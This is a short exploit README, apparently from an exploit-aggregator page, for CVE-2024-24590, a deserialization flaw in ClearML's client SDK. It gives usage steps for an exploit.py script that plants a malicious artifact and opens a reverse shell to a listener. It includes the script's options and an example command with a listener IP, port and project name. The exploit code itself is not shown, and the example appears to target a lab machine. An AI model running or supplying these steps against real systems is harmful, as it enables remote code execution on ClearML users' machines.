Share
## https://sploitus.com/exploit?id=B6CA1893-92D8-5A57-A10D-CBE61936D739
# CVE-2024-24590
Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.

## Usage
1) paste the credentials given and run clearml-init
2) run the exploit.py python script in one terminal and have a listener in another terminal
3) might need to run the exploit many times to get a reverse shell

```
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'
```
## Exploit details
1) https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
2) https://www.cvedetails.com/cve/CVE-2024-24590/